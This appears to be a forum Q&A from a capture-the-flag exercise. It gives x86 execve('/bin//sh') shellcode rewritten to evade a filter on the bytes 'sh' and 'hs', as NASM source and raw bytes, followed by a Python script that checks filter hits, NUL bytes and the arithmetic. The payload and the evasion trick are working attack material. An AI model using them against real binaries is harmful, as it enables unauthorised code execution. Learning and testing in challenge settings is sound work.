I am doing a cybersecurity challenge and need to open a shell using shellcode.
The usual shellcode is \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\x50\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80 but the binary that executes it checks that it does not contain the sequence "sh" or "hs". As I am new to shellcoding, I struggle to find the solution. Can someone help me with that? Thanks in advance
Instead of directly embedding 0x68732f2f (which in little-endian order is "2f 2f 73 68", containing "sh"), we load 0x69732f2f (which becomes "//si") and then subtract 0x01000000 to "fix" the high byte. Below is the NASM example:
section .text
global _start
_start:
xor eax, eax ; zero eax
push eax ; push null terminator
mov eax, 0x69732f2f ; load 0x69732f2f (bytes: 2f 2f 73 69 = "//si", no "sh")
sub eax, 0x01000000 ; subtract 0x01000000 => eax becomes 0x68732f2f (bytes: 2f 2f 73 68); the immediate encodes as 00 00 00 01, so this variant contains NUL bytes
push eax ; push "//sh" onto the stack
push dword 0x6e69622f ; push "/bin" onto the stack
mov ebx, esp ; ebx now points to "/bin//sh"
xor ecx, ecx ; argv = NULL
xor edx, edx ; envp = NULL
xor eax, eax ; eax still holds 0x68732f2f here; clear it so "mov al" leaves eax == 11
mov al, 0xb ; syscall number 11 (execve)
int 0x80 ; make kernel call
And here's the raw shellcode (31 bytes):
\x31\xc0\x50\xb8\x2f\x2f\x73\x69\x2d\x00\x00\x00\x01\x50\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x31\xc0\xb0\x0b\xcd\x80
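The following script is an added check, not part of the question or the answer above. It parses the `\xNN` strings quoted in this thread, reports where the challenge's forbidden sequences ("sh", "hs") occur and where NUL bytes sit (a second constraint many loaders impose when the payload is copied as a C string), verifies the load-then-subtract arithmetic for the "//sh" dword byte by byte, and models why `mov al, 0xb` only yields syscall 11 if eax was zeroed first. The only page-specific values are the two shellcode strings; the filter-safe one is the answer's variant with an extra `xor eax, eax` before `mov al, 0xb`.

```python
import re
import struct

# Byte strings copied from this thread: the classic 31-byte execve("/bin//sh")
# shellcode from the question, and the filter-safe variant from the answer
# (with eax re-zeroed before "mov al, 0xb" so the syscall number is exact).
CLASSIC = (r"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
           r"\x89\xe1\x31\xd2\x50\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80")
FILTER_SAFE = (r"\x31\xc0\x50\xb8\x2f\x2f\x73\x69\x2d\x00\x00\x00\x01\x50\x68\x2f\x62"
               r"\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x31\xc0\xb0\x0b\xcd\x80")

FORBIDDEN = (b"sh", b"hs")  # the byte sequences the challenge binary rejects


def parse_escaped(s: str) -> bytes:
    r"""Turn a '\xNN\xNN...' string as pasted in the thread into raw bytes."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", s)
    if len(pairs) * 4 != len(s):
        raise ValueError("input is not purely \\xNN escapes")
    return bytes(int(h, 16) for h in pairs)


def find_forbidden(code: bytes, patterns=FORBIDDEN) -> list:
    """Return sorted (offset, pattern) pairs for every forbidden sequence found."""
    hits = []
    for pat in patterns:
        start = 0
        while True:
            i = code.find(pat, start)
            if i == -1:
                break
            hits.append((i, pat))
            start = i + 1  # overlapping matches count too
    return sorted(hits)


def null_offsets(code: bytes) -> list:
    """Offsets of NUL bytes; relevant whenever the payload travels as a C string."""
    return [i for i, b in enumerate(code) if b == 0]


def check_immediate(loaded: int, subtract: int, target: int) -> dict:
    """Verify that loaded - subtract reconstructs target, and show the little-endian
    bytes each dword contributes to the instruction stream."""
    result = (loaded - subtract) & 0xFFFFFFFF
    return {
        "ok": result == target,
        "loaded_bytes": struct.pack("<I", loaded),
        "subtract_bytes": struct.pack("<I", subtract),
        "result_bytes": struct.pack("<I", result),
    }


def eax_after_mov_al(eax_before: int, al: int = 0xB) -> int:
    """Model 'mov al, imm8': only the low byte of eax changes, the rest is kept."""
    return (eax_before & 0xFFFFFF00) | (al & 0xFF)


def report(escaped: str) -> dict:
    """Length, forbidden-sequence hits and NUL positions for one pasted string."""
    code = parse_escaped(escaped)
    return {
        "length": len(code),
        "forbidden": find_forbidden(code),
        "nulls": null_offsets(code),
    }


if __name__ == "__main__":
    for name, s in (("classic", CLASSIC), ("filter-safe", FILTER_SAFE)):
        print(name, report(s))
    print(check_immediate(0x69732F2F, 0x01000000, 0x68732F2F))
    # eax left at 0x68732f2f before "mov al, 0xb" gives 0x68732f0b, not 11
    print(hex(eax_after_mov_al(0x68732F2F)), hex(eax_after_mov_al(0)))
```

Running it shows the classic payload tripping the filter at offset 6 with no NULs, and the filter-safe payload passing the filter but carrying three NULs from the `sub` immediate; that trade-off is what to weigh before choosing this variant for a given loader.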